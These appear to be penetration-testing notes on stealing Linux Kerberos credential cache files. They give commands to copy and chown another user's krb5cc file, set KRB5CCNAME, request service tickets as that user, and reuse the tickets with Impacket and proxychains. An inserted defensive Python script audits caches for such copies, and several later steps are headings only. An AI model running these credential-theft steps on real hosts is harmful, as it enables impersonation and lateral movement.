Kerberos Cache File

Attacking Credential Cache Files

  • If you have root access on the host, you can copy another user's credential cache file.

  • List the cache files:

    ls -al /tmp/krb5cc_*

  • Copy the file and change its ownership:

    sudo cp /tmp/krb5cc_607000500_3aeIA5 /tmp/krb5cc_minenow
    sudo chown kali:kali /tmp/krb5cc_minenow

  • To use it, destroy any old tickets and point the KRB5CCNAME environment variable at the copy:

    kdestroy
    klist
    export KRB5CCNAME=/tmp/krb5cc_minenow
    klist

  • Tickets can now be requested on that user's behalf:

    kvno MSSQLSvc/DC01.test.domain:1433

  • Run klist to view the newly added service ticket.
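From the defender's side, the steps above leave artefacts that are easy to audit: the copy sits in /tmp under a name that does not follow the krb5cc_<uid>[_<random>] pattern, or its owner no longer matches the UID embedded in the name, or its permissions are wider than 0600. The script below is an added example, not part of the original notes; it audits a cache directory for those three conditions. The CcacheMeta records and the audit_samples() data are constructed to mirror the page's scenario (the original cache of UID 607000500 and the krb5cc_minenow copy owned by UID 1000), and the filename pattern is an assumption about the default MIT Kerberos naming.

```python
import os
import re
import stat
from dataclasses import dataclass

# Default MIT krb5 FILE ccache names: krb5cc_<uid> or krb5cc_<uid>_<random suffix>
# (assumed pattern; adjust if your krb5.conf sets a different default_ccache_name).
CCACHE_NAME = re.compile(r"^krb5cc_(\d+)(?:_[A-Za-z0-9]+)?$")


@dataclass
class CcacheMeta:
    """Just the metadata the audit needs, so it can run on constructed samples."""
    name: str        # basename of the file, e.g. krb5cc_607000500_3aeIA5
    owner_uid: int   # st_uid of the file
    mode: int        # permission bits only, e.g. 0o600


def audit_ccache(meta: CcacheMeta) -> list:
    """Return a list of human-readable findings for one cache file (empty if clean)."""
    findings = []
    m = CCACHE_NAME.match(meta.name)
    if m is None:
        # A cache that does not follow the default naming is typically a manual copy.
        findings.append("non-standard name (possible copied cache)")
    else:
        uid_in_name = int(m.group(1))
        if uid_in_name != meta.owner_uid:
            # The UID baked into the name should be the UID that owns the file.
            findings.append(
                f"owner uid {meta.owner_uid} differs from uid {uid_in_name} in name"
            )
    if meta.mode & (stat.S_IRWXG | stat.S_IRWXO):
        # kinit creates caches 0600; anything wider exposes the TGT to other users.
        findings.append(f"permissions {oct(meta.mode)} allow group/other access")
    return findings


def audit_directory(tmpdir: str = "/tmp") -> dict:
    """Scan a real directory; maps path -> findings for every suspicious krb5cc_* file."""
    results = {}
    for entry in os.scandir(tmpdir):
        if not entry.name.startswith("krb5cc_") or not entry.is_file(follow_symlinks=False):
            continue
        st = entry.stat(follow_symlinks=False)
        meta = CcacheMeta(entry.name, st.st_uid, stat.S_IMODE(st.st_mode))
        findings = audit_ccache(meta)
        if findings:
            results[entry.path] = findings
    return results


# Constructed sample set modelled on the page's scenario (not real host data).
SAMPLES = [
    CcacheMeta("krb5cc_607000500_3aeIA5", 607000500, 0o600),  # legitimate cache
    CcacheMeta("krb5cc_minenow", 1000, 0o600),                 # copied + chowned
    CcacheMeta("krb5cc_607000500", 1000, 0o600),               # name kept, owner changed
    CcacheMeta("krb5cc_1001", 1001, 0o644),                    # world-readable
]


def audit_samples() -> dict:
    """Run the audit over the constructed samples; maps name -> findings."""
    return {s.name: audit_ccache(s) for s in SAMPLES if audit_ccache(s)}


if __name__ == "__main__":
    for name, findings in audit_samples().items():
        print(name)
        for f in findings:
            print("  -", f)
```

Running audit_directory() as root on a host where kinit or SSSD populate /tmp gives a quick inventory; scheduling it (or feeding the output to your SIEM) turns the copy-and-chown step into a detectable event rather than a silent one.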

Moving the krb5 file to your Kali box

Then

Verify

Then test access with Impacket's psexec

Kerberos with Impacket

  • In order to perform ticket manipulation, install the Kerberos Linux client utilities on the Kali box.

  • If you screw up the install or need to change something:

    • sudo dpkg-reconfigure krb5-config

  • We'll also have to copy the ccache file previously obtained to our local Kali box.

  • Next we'll have to update the KRB5CCNAME environment variable on our local Kali box to point at that file.

  • We'll need to update the hosts file to map the target hostnames to IP addresses.

  • The source IP address will also have to be correct, so proxychains will need to be used.

  • In proxychains4.conf, comment out the DNS option (proxy_dns).

  • Set up a SOCKS server on the pivot host.

  • Now proxychains and Impacket can be used to interact with the remote host.

  • Gather a list of available SPNs.

  • Get a shell on the remote box.

  • Renew

Convert ccache to Kirbi

Convert ccache to kirbi

Inject the ticket on the compromised host
